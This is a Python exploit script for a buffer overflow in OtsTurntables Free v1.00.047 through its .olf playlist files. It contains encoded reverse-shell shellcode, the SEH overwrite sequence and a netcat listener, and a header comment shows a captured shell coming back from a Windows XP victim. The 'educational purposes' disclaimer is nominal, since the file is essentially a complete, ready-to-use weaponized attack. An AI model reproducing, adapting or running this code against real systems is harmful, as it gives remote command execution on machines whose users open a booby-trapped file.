#!/usr/bin/python # # ################################################################### # # OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit # Date: 14-01-2010 # Author: mr_me # Software Link: http://www.otsturntables.com/download-otsturntables-free/ # Version: 1.00.047 # Tested on: Windows XP sp3 # Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz # bad chars: '\x00\x0a\xbd\x0d\x20' # # ** For educational purposes only ** # # #################################################################### # # ~! I want to go back to the matrix !~ # # mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf # # [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit # [+] Creating exploit file.. # [+] Writing 15000 bytes to awsome-electro.olf.. ph33r # [+] Send awsome-electro.olf to your target # [+] Waiting for a shell on port: 4444 # listening on [any] 4444 ... # 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out # connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\OtsLabs\Lists> # import sys, os def banner(): print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit" if len(sys.argv) < 3: banner() print "[?] Usage: " + sys.argv[0] + " " sys.exit(1) port = sys.argv[1] filename = sys.argv[2] # windows/shell_reverse_tcp - 310 bytes # http://www.metasploit.com # Encoder: x86/fnstenv_mov # LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444 shell = ("\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x47\x4b" "\x25\x9a\x83\xeb\xfc\xe2\xf4\xbb\x21\xce\xd7\xaf\xb2\xda\x65" "\xb8\x2b\xae\xf6\x63\x6f\xae\xdf\x7b\xc0\x59\x9f\x3f\x4a\xca" "\x11\x08\x53\xae\xc5\x67\x4a\xce\xd3\xcc\x7f\xae\x9b\xa9\x7a" "\xe5\x03\xeb\xcf\xe5\xee\x40\x8a\xef\x97\x46\x89\xce\x6e\x7c" "\x1f\x01\xb2\x32\xae\xae\xc5\x63\x4a\xce\xfc\xcc\x47\x6e\x11" "\x18\x57\x24\x71\x44\x67\xae\x13\x2b\x6f\x39\xfb\x84\x7a\xfe" "\xfe\xcc\x08\x15\x11\x07\x47\xae\xea\x5b\xe6\xae\xda\x4f\x15" "\x4d\x14\x09\x45\xc9\xca\xb8\x9d\x43\xc9\x21\x23\x16\xa8\x2f" "\x3c\x56\xa8\x18\x1f\xda\x4a\x2f\x80\xc8\x66\x7c\x1b\xda\x4c" "\x18\xc2\xc0\xfc\xc6\xa6\x2d\x98\x12\x21\x27\x65\x97\x23\xfc" "\x93\xb2\xe6\x72\x65\x91\x18\x76\xc9\x14\x08\x76\xd9\x14\xb4" "\xf5\xf2\x87\xe3\x27\x90\x21\x23\x34\xc6\x21\x18\xac\x7b\xd2" "\x23\xc9\x63\xed\x2b\x72\x65\x91\x21\x35\xcb\x12\xb4\xf5\xfc" "\x2d\x2f\x43\xf2\x24\x26\x4f\xca\x1e\x62\xe9\x13\xa0\x21\x61" "\x13\xa5\x7a\xe5\x69\xed\xde\xac\x67\xb9\x09\x08\x64\x05\x67" "\xa8\xe0\x7f\xe0\x8e\x31\x2f\x39\xdb\x29\x51\xb4\x50\xb2\xb8" "\x9d\x7e\xcd\x15\x1a\x74\xcb\x2d\x4a\x74\xcb\x12\x1a\xda\x4a" "\x2f\xe6\xfc\x9f\x89\x18\xda\x4c\x2d\xb4\xda\xad\xb8\x9b\x4d" "\x7d\x3e\x8d\x5c\x65\x32\x4f\xda\x4c\xb8\x3c\xd9\x65\x97\x23" "\xd5\x10\x43\x14\x76\x65\x91\xb4\xf5\x9a"); exploit = "\x41" * 900 exploit += "\xeb\x06\x90\x90" exploit += "\x46\x79\x23\x01" # CALL DWORD PTR SS:[ESP+2c] exploit += "\x90" * 30 exploit += shell exploit += "\x41" * (15000-len(exploit)) banner() try: print "[+] Creating exploit file.." print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r" print "[+] Send " + filename + " to your target" turntable = open(filename,'w'); turntable.write(exploit); turntable.close(); print "[+] Waiting for a shell on port: " + port os.system('nc -lvp ' + port) except: print "[-] Error: You do not have correct permissions.."